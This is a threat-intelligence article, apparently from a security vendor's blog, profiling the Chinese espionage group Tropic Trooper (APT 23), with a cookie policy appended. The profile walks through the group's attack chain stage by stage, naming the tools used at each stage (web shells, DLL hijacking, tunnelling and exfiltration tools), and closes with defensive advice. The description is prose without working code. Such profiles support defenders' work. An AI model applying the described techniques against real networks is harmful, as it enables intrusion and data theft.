Indonesian
Arabic
Chinese (Simplified)
Dutch
English
French
German
Italian
Portuguese
Russian
Spanish
Threat intelligence enriched with External Attack Surface Management, Brand Protection, and Dark Web Radar.
Protect your business from the dangers lurking in the hidden corners of the internet.
Effective threat hunting and threat actor tracking with behavioral analytics.
Discover your assets with a hacker mindset.
Stay ahead of threat actors with actionable intelligence alerts.
Evaluate the security posture of your entire supply network.
Your guide in harnessing the full potential of our platform.
Hear SOCRadar’s impressive achievements from our clients.
Automate and operationalize your security operations.
Consulting and professional services for cybersecurity excellence.
Industry, sector, and region-based in-depth research.
Discover the heartbeat of cyberspace through a collection showcasing the latest incidents.
Discover how XTI empowers organizations to proactively identify, mitigate, and respond to evolving cyber threats.
Register for our live webinars, and watch our on-demand webinars instantly.
Dive deep into the world of cyber threats, advanced analysis techniques, and cutting-edge strategies.
Stay informed and up-to-date on the latest cybersecurity trends.
Explore SOCRadar’s learning experience to fuel your cybersecurity journey with insights that exceed industry standards.
We offer expert-led, and exclusive trainings to help you master the latest in cybersecurity, trusted by over 2,000 top companies.
Scan the dark web to prevent your leaks from turning into real risks.
Instantly access dark web findings about your organization’s assets.
Check if there is anything about you in SOCRadar’s ever-expanding breach database.
Track threat actors and groups by country or industry for effective follow-up.
Explore threat actors’ tactics, techniques, activities, and detailed profiles targeting your industry or region.
All-in-one next-generation tools for investigating everyday events like phishing, malware, account breach, etc.
Power your search with SOCRadar’s IOC Radar.
Let’s get to know each other better.
Broaden your market reach and increase ARR with SOCRadar Extended Threat Intelligence.
Get informed of our upcoming events.
Latest news about our platform, company, and what’s being said about us.
Begin an extraordinary journey in your professional path with SOCRadar.
We’d like to hear from you.
SOCRadar Training Series – Mastering AI in Cybersecurity From Theory to Practice
Resources
Tropic Trooper, also known as Pirate Panda and APT 23, is a Chinese state-sponsored cyber threat group that has been active since 2011. Specializing in espionage, the group primarily targets sensitive sectors like government, healthcare, and transportation. Their operations have been focused on areas such as Taiwan, Hong Kong, and the Philippines, where they employ advanced tactics to compromise networks and steal valuable information.
Threat actor card of Tropic Trooper
Tropic Trooper is a cyber espionage group attributed to Chinese state-sponsored activities, primarily active since 2011. The group operates under various names, including Pirate Panda, APT 23, Iron, KeyBoy, Bronze Hobart, Earth Centaur. They are known for their sophisticated techniques and targeted attacks, often focusing on sectors crucial to national interests, such as government, telecommunications, and technology. With a strong emphasis on intelligence gathering, Tropic Trooper utilizes social engineering and advanced malware to infiltrate networks and extract sensitive data. Their operations typically align with the geopolitical interests of China.
Their attacks frequently involve the infiltration of networks through spear-phishing campaigns, which are designed to deceive individuals into providing access to confidential data or systems. Over the years, Tropic Trooper has adapted its tactics, demonstrating a keen ability to innovate and evade detection, which makes them a persistent threat in the cyber landscape. Their targeted approach and technical prowess underscore their significance as a key player among state-sponsored threat actors.
Tropic Trooper initiates attacks primarily through spear-phishing campaigns, carefully crafted with extensive social engineering to appeal directly to their targets. These emails often contain malicious attachments, such as Microsoft Office files or PDFs, or embed links that, once clicked, lead to websites hosting exploit kits.
Point of entry, a malicious doc (TrendMicro)
They exploit common application vulnerabilities, including those in Microsoft Office, to execute malware payloads that establish a foothold in the victim’s system. Tropic Trooper’s spear-phishing emails are customized, often incorporating language, subject matter, and scenarios relevant to the target’s environment to maximize the chances of engagement. This calculated initial access strategy enables Tropic Trooper to breach networks within government, healthcare, and high-value sectors across Southeast Asia.
Thus, they not only gain access through phishing, but they can also exploit Web server vulnerabilities, especially Exchange Server, and create attack vectors using Webshell.
A malicious module was found inside Umbraco CMS – an open source .NET content management system- on the compromised server (Securelist)
Tools used in 2021 and 2024 attacks in this step:
Fscan: Used for vulnerability scanning, detecting open ports, and available services on target machines. Tropic Trooper also uses an ICMP-based script to identify accessible devices for exploitation.
Swor: Deployed for penetration testing, it facilitates initial access and includes mimikatz and FRP for additional exploitation.
Following initial access, Tropic Trooper leverages sophisticated custom malware, including TClient, and Yahoyah ChinaChopper, designed for persistence. These tools allow Tropic Trooper to maintain continuous access to compromised systems, systematically collecting, encrypting, and transmitting sensitive data to their servers over long periods. To avoid detection, they employ advanced obfuscation and encryption techniques, modifying their malware periodically to evade signature-based security measures. This persistent access not only secures a stable position within the network but also supports Tropic Trooper’s broader espionage objectives, allowing them to collect intelligence and track target activity over time.
Malicious function implementing China Chopper registered as a callback function (Securelist)
Tools used:
ChinaChopper: A small but powerful web shell used for persistent access, allowing Tropic Trooper to maintain control even if other tools are detected.
YAHOYAH: Ensures persistence by encrypting its payload, making it harder to detect and allowing the attacker to reload it as needed.
PoisonIvy: Ensures persistence through autostart execution and system modifications that help re-establish access upon reboot.
Once established, Tropic Trooper seeks to elevate its privileges within the infected network. They exploit vulnerabilities in widely used applications or leverage privilege escalation exploits tailored to the target’s system environment. By doing so, they transition from low-level user access to higher-level administrative permissions, granting them enhanced control over critical network resources and security configurations. This escalation allows them to disable security controls selectively and to navigate the environment with greater freedom, ultimately facilitating deeper infiltration and access to high-value data assets.
In one instance in 2024, Kaspersky stated that attackers utilized DLL search-order hijacking to implant backdoor loaders (datast.dll and VERSION.dll). The process involves planting malicious DLLs alongside legitimate executables vulnerable to search-order hijacking, enabling the malicious DLL to load as if it were part of the original program. Once loaded, datast.dll decrypts and executes the shellcode for further malware stages, leveraging functions within a secondary DLL to conceal its activities. The attackers reportedly employed Umbraco web shells to place these malicious files on compromised servers.
Code stub responsible for decrypting the next stage (Securelist)
Tools used:
ShadowPad: Utilized for privilege escalation through dynamic-link library injection, bypassing security controls for enhanced access.
Upon achieving elevated privileges, Tropic Trooper initiates lateral movement, systematically navigating the network to extend their reach across interconnected devices and servers. Using reconnaissance tools, they map network topologies, identify accessible resources, and pinpoint potential vulnerabilities in the organization’s infrastructure. They then employ various propagation techniques, including credential harvesting and exploitation of network misconfigurations, to spread to additional systems. By doing so, Tropic Trooper ensures that they retain access to multiple points within the network, allowing them to re-establish connections even if detection efforts uncover some parts of their operation.
Tools used:
Neo-reGeorg: A SOCKS5 proxy tool, allowing Tropic Trooper to pivot across networks and evade network security controls.
FRPC (Fast Reverse Proxy Client): Assists in lateral movement by exposing local servers behind firewalls.
Chisel: Facilitates TCP/UDP tunneling, allowing traffic forwarding across the compromised network.
Data exfiltration is the final objective, as Tropic Trooper systematically targets and extracts classified or strategically valuable information, including government documents, healthcare records, and military data. Once they’ve mapped out the network and identified high-priority assets, they employ data compression, encryption, and stealthy data transfer methods to exfiltrate information undetected. Often, exfiltration is staged to avoid triggering network alarms; Tropic Trooper minimizes data volumes or utilizes obscure channels to avoid standard detection protocols. Through encrypted tunnels, they transfer this intelligence to remote command and control servers, focusing on data that supports their long-term intelligence and espionage goals in political, economic, and security domains.
Tools used:
SharpHound: Maps Active Directory relationships and identifies key systems and paths for further infiltration.
USBferry: Used for network discovery and spreading across devices connected through removable media.
RClone: Syncs files to and from cloud storage for large-scale data exfiltration.
BITSAdmin: Transfers data over alternative protocols like BITS Jobs to avoid detection.
After 2020, two comprehensive reports, one from TrendMicro and another from Kaspersky, have been released to the community. The differences in each report’s approach highlight the ongoing evolution of the group’s tactics and strategies. Between 2021 and 2024, Tropic Trooper significantly expanded and evolved its operations. Originally focused on government, healthcare, and high-tech sectors in regions like Taiwan, Hong Kong, and the Philippines, Earth Centaur broadened its geographical and strategic scope by 2023, targeting transportation, governmental agencies, and human rights organizations in Southeast Asia and the Middle East. This shift included a focus on sensitive geopolitical areas and issues, like those involving Middle Eastern governments and human rights organizations linked to ongoing conflicts.
During this period, Tropic Trooper’s tactics also became more sophisticated. They continued using known exploits for entry—particularly in vulnerable Microsoft Exchange and Adobe ColdFusion servers—and employed a revamped set of malware tools. For example, in 2024, they introduced the “Crowdoor” backdoor variant to deliver Cobalt Strike payloads, enabling them to establish persistent access and gather sensitive information covertly. This is alongside the continued use of Quasar RAT, a tool they’d utilized in previous years but with increased efficiency through enhancements like custom decryption algorithms and DLL side-loading.
Their technical approach increasingly mirrors advanced red-teaming techniques, which reflect an evolution toward a more agile, adaptable operation style, enabling them to bypass network security more effectively. Their goals, however, remain consistent with prior espionage-focused activities, with an emphasis on internal data collection from compromised networks for long-term strategic use.
Tropic Trooper’s attacks are concentrated on highly sensitive sectors, primarily in Southeast Asia. Government institutions, healthcare organizations, and military entities in Taiwan, the Philippines, and Hong Kong have been frequent targets. Their operations focus on accessing data that could provide strategic advantages in political, economic, or military arenas. By compromising governmental networks, Tropic Trooper aims to gather intelligence that informs national security interests, while attacks on healthcare sectors often seek to obtain sensitive personal and medical records, which can further their political or tactical objectives.
Tropic Trooper’s most common targets are government agencies and ministries. By infiltrating these networks, they gather data that could serve national intelligence or political strategies, focusing on sectors involved in policy-making, economic development, and international relations.
Healthcare facilities and research centers are targeted for their valuable data on citizens, medical records, and scientific advancements. Tropic Trooper leverages this information to analyze population health data or disrupt public health infrastructure. Attacks on these sectors are often strategic, serving geopolitical or economic motives aligned with the interests of their sponsors.
The group also has a history of breaching military networks, seeking out plans, defense strategies, and communications data. These intrusions into defense sectors are intended to obtain intelligence on military capabilities, troop movements, and strategic defense postures, providing critical information that could be advantageous in regional security dynamics.
Organizations facing potential threats from Tropic Trooper can employ a comprehensive defense strategy to detect, prevent, and respond to cyber incidents. By implementing the following security measures, companies can strengthen their defenses and reduce the likelihood of compromise:
Since Tropic Trooper frequently relies on spear-phishing emails to initiate attacks, organizations should implement robust email filtering solutions to detect and block malicious emails. Training employees to recognize phishing attempts and report suspicious emails is essential to prevent initial access.
Limiting user privileges based on job roles and implementing Multi-Factor Authentication (MFA) can prevent Tropic Trooper from easily gaining unauthorized access to sensitive systems. Privileged Account Management (PAM) tools can monitor and secure high-level access accounts, reducing the likelihood of lateral movement within the network.
To limit the spread of an intrusion, organizations should segment their networks by grouping systems with similar functions together and restricting communication between them. This containment measure can prevent threat actors from easily moving between different network segments, reducing the overall impact of a breach.
Deploying advanced EDR solutions on endpoints allows security teams to monitor unusual activity, detect malware, and analyze suspicious files in real time. EDR tools offer insight into endpoint activity, aiding in the early detection of Tropic Trooper’s custom malware and persistence mechanisms.
Organizations should prioritize regular software updates and patches for all systems and applications. Addressing known vulnerabilities can limit potential attack vectors exploited by groups like Tropic Trooper, reducing the risk of exploitation and unauthorized access.
Continuous network monitoring and Intrusion Detection Systems (IDS) can help detect and mitigate unauthorized traffic within the organization’s infrastructure. By identifying abnormal traffic patterns or unauthorized access attempts, security teams can respond swiftly to potential threats, reducing the risk of data exfiltration.
Having an incident response plan tailored to Advanced Persistent Threats (APTs) allows security teams to respond effectively if Tropic Trooper infiltrates the network. Cyber threat intelligence (CTI) teams can enhance this plan by staying informed of Tropic Trooper’s latest TTPs, enabling proactive defense and faster identification of attack patterns.
SOCRadar’s Extended Cyber Threat Intelligence (XTI) offers support to organizations combating the evolving threat of threat actors like Troopic Trooper through a suite of advanced cybersecurity tools and services.
SOCRadar’s Operational Intelligence/Threat Actor Intelligence
Tropic Trooper remains a formidable and adaptive threat, continually targeting sensitive sectors across East Asia with sophisticated techniques and a long history of state-sponsored espionage. Known by various names, including Pirate Panda and APT 23, this group has honed its approach to employ advanced malware, spear-phishing tactics, and lateral movement strategies that enable them to infiltrate and extract valuable information from critical infrastructures. Their operations reflect a strategic focus aligned with China’s geopolitical interests, making them a key player in the cyber threat landscape.
To combat the persistent threat posed by Tropic Trooper, organizations must adopt a comprehensive cybersecurity framework. This should include enhanced email security, strict access controls, network segmentation, and advanced endpoint detection solutions. By fostering a proactive security culture and maintaining an updated incident response plan, organizations can significantly bolster their defenses against the sophisticated tactics employed by Tropic Trooper and similar state-sponsored actors.
Sources: [1],[2],[3]
For the latest IoCs and YARA / Sigma Rules visit SOCRadar Platform’s Threat Actor Intelligence tab.
Subscribe to our newsletter and stay updated on the latest insights!
PROTECTION OF PERSONAL DATA COOKIE POLICY FOR THE INTERNET SITE
Protecting your personal data is one of the core principles of our organization, SOCRadar, which operates the internet site (www.socradar.com). This Cookie Usage Policy (“Policy”) explains the types of cookies used and the conditions under which they are used to all website visitors and users.
Cookies are small text files stored on your computer or mobile device by the websites you visit.
Cookies are commonly used to provide you with a personalized experience while using a website, enhance the services offered, and improve your overall browsing experience, contributing to ease of use while navigating a website. If you prefer not to use cookies, you can delete or block them through your browser settings. However, please be aware that this may affect your usage of our website. Unless you change your cookie settings in your browser, we will assume that you accept the use of cookies on this site.
1. WHAT KIND OF DATA IS PROCESSED IN COOKIES?
Cookies on websites collect data related to your browsing and usage preferences on the device you use to visit the site, depending on their type. This data includes information about the pages you access, the services and products you explore, your preferred language choice, and other preferences.
2. WHAT ARE COOKIES AND WHAT ARE THEIR PURPOSES?
Cookies are small text files stored on your device or web server by the websites you visit through your browsers. These small text files, containing your preferred language and other settings, help us remember your preferences on your next visit and assist us in making improvements to our services to enhance your experience on the site. This way, you can have a better and more personalized user experience on your next visit.
The main purposes of using cookies on our Internet Site are as follows:
3. TYPES OF COOKIES USED ON OUR INTERNET SITE 3.1. Session Cookies
Session cookies ensure the smooth operation of the internet site during your visit. They are used for purposes such as ensuring the security and continuity of our sites and your visits. Session cookies are temporary cookies and are deleted when you close your browser; they are not permanent.
3.2. Persistent Cookies
These cookies are used to remember your preferences and are stored on your device through browsers. Persistent cookies remain stored on your device even after you close your browser or restart your computer. These cookies are stored in your browser’s subfolders until deleted from your browser’s settings. Some types of persistent cookies can be used to provide personalized recommendations based on your usage purposes.
With persistent cookies, when you revisit our website with the same device, the website checks if a cookie created by our website exists on your device. If so, it is understood that you have visited the site before, and the content to be presented to you is determined accordingly, offering you a better service.
3.3. Mandatory/Technical Cookies
Mandatory cookies are essential for the proper functioning of the visited internet site. The purpose of these cookies is to provide necessary services by ensuring the operation of the site. For example, they allow access to secure sections of the internet site, use of its features, and navigation.
3.4. Analytical Cookies
These cookies gather information about how the website is used, the frequency and number of visits, and show how visitors navigate to the site. The purpose of using these cookies is to improve the operation of the site, increase its performance, and determine general trend directions. They do not contain data that can identify visitors. For example, they show the number of error messages displayed or the most visited pages.
3.5. Functional Cookies
Functional cookies remember the choices made by visitors within the site and recall them during the next visit. The purpose of these cookies is to provide ease of use to visitors. For example, they prevent the need to re-enter the user’s password on each page visited by the site user.
3.6. Targeting/Advertising Cookies
They measure the effectiveness of advertisements shown to visitors and calculate how many times ads are displayed. The purpose of these cookies is to present personalized advertisements to visitors based on their interests.
Similarly, they determine the specific interests of visitors’ navigation and present appropriate content. For example, they prevent the same advertisement from being shown again to the visitor in a short period.
4. HOW TO MANAGE COOKIE PREFERENCES?
To change your preferences regarding the use of cookies, block or delete cookies, you only need to change your browser settings.
Many browsers offer options to accept or reject cookies, only accept certain types of cookies, or receive notifications from the browser when a website requests to store cookies on your device.
Also, it is possible to delete previously saved cookies from your browser.
If you disable or reject cookies, you may need to manually adjust some preferences, and certain features and services on the website may not work properly as we will not be able to recognize and associate with your account. You can change your browser settings by clicking on the relevant link from the table below.
5. EFFECTIVE DATE OF THE INTERNET SITE PRIVACY POLICY
The Internet Site Privacy Policy is dated The effective date of the Policy will be updated if the entire Policy or specific sections are renewed. The Privacy Policy is published on the Organization’s website (www.socradar.com) and made accessible to relevant individuals upon request.
SOCRadar
Address: 651 N Broad St, Suite 205 Middletown, DE 19709 USA
Phone: +1 (571) 249-4598
Email: [email protected]
Website: www.socradar.com